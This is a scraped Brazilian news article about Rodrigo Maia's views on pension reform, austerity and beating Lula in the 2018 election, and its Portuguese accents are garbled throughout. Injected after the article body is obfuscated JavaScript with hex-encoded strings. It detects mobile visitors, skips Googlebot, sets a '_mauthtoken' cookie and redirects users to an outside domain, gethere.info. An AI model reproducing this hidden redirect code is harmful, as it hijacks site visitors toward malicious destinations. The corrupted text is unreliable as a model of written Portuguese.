Home » Brasil » Congresso » Rodrigo Maia quer defender austeridade em eleiA�A�es e vencer Lula nas urnas

Rodrigo Maia quer defender austeridade em eleiA�A�es e vencer Lula nas urnas

O presidente da CA?mara, Rodrigo Maia (DEM-RJ), acredita que o ministro da Fazenda e possA�vel candidato A� PresidA?ncia da RepA?blica, Henrique Meirelles (PSD), deveria apresentar A� sociedade uma agenda que avance alA�m da reforma da PrevidA?ncia. a�?Na minha opiniA?o, a agenda do ministro Meirelles, e nA?o estou aqui querendo criticara�� Ela comete (um erro), do meu ponto de vista, e jA? disse (isso) a alguns assessores dele. Ela vai sA? na primeira parte do processo. A sociedade quer saber como vocA? faz a segundaa�?, disse o deputado, em entrevista ao programa Canal Livre, da TV Bandeirantes, exibida no inA�cio da madrugada desta segunda-feira, 8. a�?Todos nA?s que temos essa agenda (da reforma) como prioritA?ria, temos que falar da segunda parte da agenda. SenA?o fica muito A?rida. Fica sA? a parte que, em tese, vai tirar alguma coisa de alguA�m. Que nA?o A� verdade, mas A� o que se vende aA�, pelos campos da esquerda.a�?

Ao responder uma questA?o sobre a convergA?ncia de pensamento de prA�-candidatos que se colocam como alternativas de centro nas eleiA�A�es deste ano a�� caso de Meirelles e do governador de SA?o Paulo, Geraldo Alckmin (PSDB) -, Maia demonstrou distanciamento do ministro da Fazenda. a�?Discordo frontalmente de que a minha agenda necessariamente A� 100% igual ao que pensa o Meirellesa�?, afirmou, para entA?o dizer que o possA�vel candidato do PSD A� PresidA?ncia deveria apresentar A� sociedade um discurso que justifique a reforma da PrevidA?ncia e que mostre o impacto que ela terA? na vida das pessoas. a�?Por que vai fazer a reforma da PrevidA?ncia? Ela existe porque na hora que tem uma rebeliA?o em GoiA?s (como ocorreu no inA�cio deste ano), os governadores fazem uma carta e todos os pedidos deles tA?m relaA�A?o com dinheiro. Porque estA? faltando recurso para a seguranA�a. A gente quer a reforma da PrevidA?ncia para reduzir o gasto aqui para sobrar recurso e cuidar da seguranA�aa�?, afirmou o parlamentar.

A respeito da votaA�A?o da reforma na CA?mara, marcada para a semana do dia 19 de fevereiro, Maia manteve o discurso otimista. a�?Dia 19 vamos ter votoa�?, afirmou. a�?O deputado A� pragmA?tico. A� um tema polA?mico, mas fundamental.a�? O parlamentar afirmou que o governo, a�?em um primeiro momentoa�?, falhou na comunicaA�A?o das mudanA�as na PrevidA?ncia. Agora, no entanto, ele acredita que o a�?que estA? colocado para a populaA�A?o A� facilmente explicA?vel para a sociedadea�?. Maia contou um episA?dio recente em que teria saA�do aplaudido apA?s fazer um discurso em defesa da reforma em um a�?bairro simplesa�? (sem identificar a cidade).

O presidente da CA?mara voltou a lamentar que a reforma nA?o tenha sido aprovada no ano passado, por causa das denA?ncias da Procuradoria-Geral da RepA?blica contra o presidente Michel Temer a�?Em marA�o ia votar. A gente estaria hoje com previsA?o de crescimento de 4% a 4,5% da economia. Ia ter que estar controlando o consumo de energia por causa disso.a�?

PresidenciA?vel

Maia participou do programa Canal Livre no A?mbito de uma sA�rie de entrevistas dedicada aos possA�veis candidatos A� PresidA?ncia. Apesar disso, disse que, no momento, a chance de ser o escolhido do DEM A� a�?zeroa�?, embora reconheA�a que seu nome esteja a�?colocado no debatea�?. a�?O DEM vai ter um candidato nessa bancada aqui (durante as eleiA�A�es), o candidato do DEM, nA?o estou dizendo que sou eu.a�? Ele citou como outros possA�veis nomes do partido o ministro da EducaA�A?o, MendonA�a Filho (PE), e o prefeito de Salvador, ACM Neto. A A?ltima vez que o DEM encabeA�ou uma chapa presidencial foi em 1989, com Aureliano Chaves (o partido ainda se chamava PFL).

Maia disse que, acima da discussA?o sobre candidaturas ou sobre a eventual uniA?o de partidos de centro-direita, A� preciso que seja definido um projeto a�?que saia do populismo, da demagogiaa�?. a�?Quero fazer parte de um projeto que seja muito transparente com a sociedade, que fale pra sociedade de forma clara: a�?tem aqui um volume de despesas que A� incompatA�vel com a realidade do Brasila�� a�? NA?o A� possA�vel, no entanto, a�?misturar o governo com a construA�A?o de um projetoa�?, disse Maia. a�?O governo A� beneficiA?rio desse candidato (que defenderia a agenda reformista e de corte de gastos). A agenda que o governo colocou na pauta A� uma agenda que A� convergente com a desse candidato. Agora se vocA? comeA�ar a estar preocupado com candidato que A� pra defender governo, nA?o vai sair do lugar. VocA? vai perder a oportunidade de atrair outros polos da sociedade em um primeiro momento.a�?

O presidente da CA?mara acredita ser possA�vel participar da eleiA�A?o com o discurso da austeridade. a�?Se for pra ganhar mentindo, A� melhor perder falando a verdade.a�? Em tom de brincadeira, Maia afirmou que o centro estA? congestionado (por causa do grande nA?mero de prA�-candidatos), mas ao mesmo tempo vazio (pois nA?o hA? um prA�-candidato dessa linha que apareA�a bem nas pesquisas). a�?Tem que ver como se constrA?i um cento com votosa�?. Maia declarou a�?apostar tudoa�? na ideia de que a aprovaA�A?o da reforma da PrevidA?ncia irA? gerar efeitos econA?micos positivos ainda em perA�odo eleitoral, o que tem o potencial de beneficiar eleitoralmente seus defensores. a�?Se (a reforma) nA?o for aprovada, o cenA?rio econA?mico serA? pior para a eleiA�A?o e ruim para quem estA? na base do governo, mas o debate da reforma do Estado estA? colocadoa�?, disse.

Lula

Sobre o lA�der das pesquisas, o ex-presidente Luiz InA?cio Lula da Silva, Maia disse preferir que ele seja vencido nas urnas. a�?Queria disputar com o Lula. Ele sairA? derrotado da eleiA�A?o. Vamos acabar com o mito.a�? Segundo o presidente da CA?mara, a campanha servirA? para mostrar que o petista A� o a�?culpadoa�? pela crise. a�?Lula estA? bem nas pesquisas porque o governo do presidente Michel estA? injustamente muito mal avaliadoa�?, disse. a�?O candidato que for para o debate, colocar o dedo na ferida, tem espaA�o para que ele (Lula) nA?o tenha os 30% (de intenA�A?o de voto) que tem hoje.a�? Maia disse nA?o crer em a�?convulsA?o sociala�? caso a condenaA�A?o de Lula seja confirmada pelo Tribunal Regional Federal da 4A? RegiA?o, em Porto Alegre, no dia 24.

Regra de ouro

O presidente da CA?mara afirmou ainda que a flexibilizaA�A?o da chamada a�?regra de ouroa�?, que impede o governo de emitir dA�vida em volume superior a investimentos, A� necessA?ria para 2019. Segundo ele, com o atual crescimento das despesas, a�?a regra de ouro fica impossA�vel de ser atingidaa�? no prA?ximo ano. Maia disse que a discussA?o sobre a medida A� a a�?provaa�? da necessidade de aprovar a reforma da PrevidA?ncia.

O parlamentar aproveitou a discussA?o sobre o tema para alfinetar o presidente do Banco Nacional de Desenvolvimento EconA?mico e Social (BNDES), Paulo Rabello de Castro. O deputado lembrou que o cumprimento da regra para este ano pode ser assegurado com a devoluA�A?o de R$ 180 bilhA�es pelo banco ao Tesouro Nacional. Rabello, no entanto, jA? mostrou resistA?ncia em devolver os recursos. a�?Ele deve ter sido nomeado pelo presidente (dos Estados Unidos, Donald) Trump e aA� nA?o quer devolvera�?, comentou Maia.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Publicação: Redação Brasil (m)
Tags

Publicações Similares

Login

Perdeu sua senha?